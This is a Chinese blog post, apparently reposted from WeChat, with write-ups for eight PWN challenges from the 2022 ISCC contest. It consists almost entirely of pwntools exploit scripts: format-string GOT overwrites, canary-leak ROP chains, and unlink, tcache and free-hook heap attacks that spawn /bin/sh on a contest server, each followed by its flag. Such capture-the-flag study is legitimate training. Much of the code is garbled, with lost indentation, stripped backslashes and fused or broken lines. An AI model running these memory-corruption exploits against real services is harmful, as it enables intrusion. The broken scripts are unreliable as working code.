本文来自:天权网安生态圈
作者:天权Megrez
首言
最近我们参加了2022年ISCC信息安全与对抗技术竞赛WP-1,现在我们来看看这次比赛的题目和解答方法吧!今天我们主要讲解关于PWN的题目。
01
create_id
exp:
from pwn import *
# r=process("./31")
r = remote("123.57.69.203", "5310")
r.recv(2)
t = int(r.recv(8), 16)
print((t))
r.sendline('1')
r.recv()
r.sendline('1')
r.recv()
pay = fmtstr_payload(10, {(t): 9})
r.sendline(pay)
r.interactive()
ISCC{6265-32f2-46d3-b7ff-3c20}
02
sim_treasure
exp:
from pwn import *
context.log_level='debug'
#io=process("./sp1")
io=remote("123.57.69.203", 7010)
elf = ELF("./sp1")
libc = ELF("./libc-2.27.so")
puts_got = elf.got['puts']
io.recvuntil("Can you find the magic word?n")
pay_1 = p32(elf.got["puts"])+"%6$s"
io.sendline(pay_1)
io.recv(4)
puts_addr = u32(io.recv(4))
print "puts_got="+hex(puts_addr)
printf_got = elf.got['printf']
print "printf_got="+hex(printf_got)
libc_base = puts_addr - libc.symbols['puts']
system_addr=libc_base+libc.symbols['system']
print "system_addr="+hex(system_addr)
io.sendline("A")
payload1=fmtstr_payload(6,{printf_got: system_addr})
io.recvuntil("An")
io.sendline(payload1)
io.sendline("/bin/sh")
io.interactive();
ISCC{5239-97f2-482b-bdaf-4ab5}
03
跳一跳
exp:
from pwn import *
context.log_level = 'debug'
p = remote('123.57.69.203', 7020)
elf = ELF('./pwn2')
p.recvuntil('~')
for i in range(232 - 15):
p.sendline(b'255')
for i in range(7):
p.sendline(b'+')
for i in range(6):
p.sendline('+')
for i in range(2):
p.sendline(b'255')
# main=elf.sym['main']
p.recvuntil('xff' * (232 - 15))
canary = u64(b'�' + p.recv(7))
success('canary:' + hex(canary))
stack_addr=u64(p.recvuntil(b'x7f')[-6:]+ b'��')
success('stack:' + hex(stack_addr))
p.recvuntil('xffxff')
code_base = u64(p.recv(6) + b'��') - 24 - elf.sym['main']
success('code_base:' + hex(code_base))
# 0x000000000000124a : leave ; ret
leave = 0x124a + code_base
# 0x000000000000130b : pop rdi ; ret
pop_rdi = 0x130b + code_base
payload(p64(pop_rdi)+p64(code_base+elf.got['puts'])+p64(code_base+elf.sym['puts'])+p64(pop_rdi+1)+p64(code_base+elf.sym['main'])).ljust(0xd8,b'a')+p64(canary)+p64(stack_addr-0xf8)+ p64(leave)
p.send(payload)
libc_addr = u64(p.recvuntil(b'x7f')[-6:].ljust(8, b'�')) - 0x0809c0
success('libc_addr:' + hex(libc_addr))
p.recvuntil('~')
for i in range(232 - 15):
p.sendline(b'255')
for i in range(7):
p.sendline(b'+')
for i in range(8):
p.sendline('+')
p.recvuntil('xff' * (232 - 15))
canary = u64(b'�' + p.recv(7))
success('canary:' + hex(canary))
payload(p64(pop_rdi)+p64(libc_addr+0x1b3e9a)+p64(0x04f440+libc_addr)).ljust(0xd8,b'a') + p64(canary) + p64(stack_addr - 0xf8 - 0xd0) + p64(leave)
# gdb.attach(p)
p.send(payload)
p.interactive()
ISCC{65eb-c6ea-45cb-a65c-453c}
04
unlink
exp:
from pwn import *
# r=process('./attachment-38')
# gdb.attach(r)
context.log_level = 'debug'
r = remote('123.57.69.203', '5810')
def add(idx, size, data):
r.sendline("add")
r.recvuntil("Index: ")
r.sendline(str(idx))
r.recvuntil("Size: ")
r.sendline(str(size))
r.recvuntil("Data: ")
r.sendline(data)
def dele(idx):
r.sendline("remove")
r.recvuntil("Index: ")
r.sendline(str(idx))
target = 0x601008
add(0, 0x40, '')
add(1, 0x80, '')
add(2, 0x80, '')
add(3, 0x20, 'HRP')
dele(0)
dele(2)
dele(1)
add(0,0x40,'a'*0x40+p64(0)+p64(0x91)+p64(0x601018))add(1,0x80,p64(0x6001030))
add(1,0x80,p64(0x6001030)+ 'x96x08x40')
r.sendline('/bin/sh')
r.interactive()
ISCC{4cc2-9473-4417-a556-ec4a}
05
untidy_note
exp:
from pwn import *
# r=process('./pwn3')
r = remote("123.57.69.203", "7030")
context.log_level = 'debug'
libc = ELF('libc-2.27.so')
def add(how):
r.recvuntil("is:n")
r.sendline("1")
r.recvuntil("is:n")
r.sendline(str(how))
def edit(which, how, what):
r.recvuntil("is:n")
r.sendline("3")
r.recvuntil(":n")
r.sendline(str(which))
r.recvuntil("is:n")
r.sendline(str(how))
r.recvuntil(":n")
r.sendline(what)
def show(which):
r.recvuntil("is:n")
r.sendline("4")
r.recvuntil(":n")
r.sendline(str(which))
def dele(which):
r.recvuntil("is:n")
r.sendline("2")
r.recvline()
r.sendline(str(which))
# gdb.attach(r)
r.recv()
r.sendline('1')
for i in range(10):
add(30)
for i in range(8):
dele(i)
r.recv()
r.sendline('1' * 0x400)
show(7)
r.recvuntil("Content:")
base = u64(r.recv(6) + 'x00' * 2) - 0x3ebcc0
print(hex(base))
# raw_input()
free_hook = base + libc.sym['__free_hook']
sys = base + libc.sym['system']
edit(1, 30, p64(free_hook) * 2)
for i in range(7):
add(30)
edit(4, 30, "/bin/shx00")
edit(8, 30, p64(sys))
dele(4)
r.interactive()
ISCC{e484-edee-4788-bb33-ead3}
06
h-o-s
exp:
from pwn import *
#r=process('./attachment-39')
r=remote('123.57.69.203','5820')
context.log_level='debug'
def fill(size,str1):
r.sendline("fill")
sleep(0.1)
r.sendline(str(size))
sleep(0.1)
r.sendline(str1)
def get():
r.sendline("get")
r.sendline('a'*0x60+p64(0)+p64(0x411)+p64(0x601018)+p64(0x601110))
get()
r.sendline('a'*0x60+p64(0)+p64(0x411)+p64(0x601018)+p64(0x601110))
get()
fill(0x400,p64(0x601018))
fill(0x400,p64(0x6001030)+p64(0x400806))
r.sendline("/bin/sh")
r.interactive()
ISCC{af31-219c-4214-b561-930e}
07
heapheap
exp:
from pwn import *
def add(size, con):
r.recvuntil("Please input your choice: ")
r.sendline("1")
r.recvuntil(":")
r.sendline(str(size))
r.recvuntil(":")
r.send(con)
def dele(index):
r.recvuntil("Please input your choice: ")
r.sendline("2")
r.recvuntil(":")
r.sendline(str(index))
def pwn():
for i in range(6):
add(0xf0, 'a') # 0-5
add(0xf0, 'a') # 6
add(0x80, 'a') # 7
add(0xf0, 'a') # 8
add(0xf0, 'a') # 9
for i in range(6):
dele(i)
dele(9)
dele(6)
dele(7)
add(0x88, 'a' * 0x80 + p64(0x90 + 0x100))
dele(8)
for i in range(9):
add(0xf0, '1')
for i in range(8, 5, -1):
dele(i)
dele(9)
dele(0)
add(0xf0, 'x50x9a')
add(0xf0, 'x50x9a')
add(0xf0, p64(0) + p64(0x91) + 'x60xe7')
dele(0)
dele(6)
add(0xf0, 'x60x9a')
add(0xf0, 'x60x9a')
add(0xf0, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x00))
add(0xf0, p64(0x0FBAD1887) + p64(0) * 3 + p8(0x00))
libc_base=u64(r.recvuntil('x7f', timeout=1)[-6:].ljust(8, 'x00')) - 0x3ed8b0
log.info("libc_base:" + hex(libc_base))
free = libc_base + 0x61b060 + 3840
print(hex(free))
dele(1)
dele(2)
dele(0)
dele(6)
add(0xf0, p64(free))
# add(0xf0,'cat flagx00')
add(0xf0, p64(0x10a428 + libc_base))
add(0xf0, p64(0x10a428 + libc_base))
r.recv()
r.sendline("3")
r.sendline("cat flag.txt")
a = r.recv()
r.sendline("cat flag")
b = r.recv()
return a + b
while 1:
try:
r = process('./heapheap')
libc = ELF("libc-2.27.so")
r = remote("123.57.69.203", "5320")
# context.log_level='debug'
# gdb.attach(r)
a = pwn()
print(a)
if "{" in a:
break
except Exception as e:
r.close()
ISCC{6378-9273-4f96-b0d9-6fe6}
08
Huge_Space
exp:
import time
from pwn import *
context.arch = 'amd64'
context.log_level = 'debug'
r = lambda : p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
close = lambda : p.close()
debug = lambda : gdb.attach(p)
shell = lambda : p.interactive()
def add(idx, size, con):
sl("+++")
sla('Index:',str(idx))
sla('Size: ', str(size))
sla('Data: ',con)
def show(idx, size):
sl("print")
sla('Index:',str(idx))
sla('Size: ', str(size))
# p = process('./pwn')
p = remote('123.57.69.203','5330')
elf = ELF('./pwn')
system = elf.plt['system']
strncmp = elf.got['strncmp']
# gdb.attach(p ,'b *0x400A20') #malloc
s('n')
add(0, 0x10, 'a'*0x18+p64(0xffffffffffffffff))
add(1, -0x1240, 'b'*8)
add(3, 0x10, p64(strncmp))
add(4, 0x30, p64(system))
sl('/bin/sh')
# debug()
shell()
ISCC{1e74-6dcc-40af-a179-42ad}
总结
今天我们公布的主要是关于练武题中PWN方向的题目,其他方向的题目将会在未来几天陆续公布,敬请期待!
原文始发于微信公众号(天权信安):2022年ISCC信息安全与对抗技术竞赛WP-1(1)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论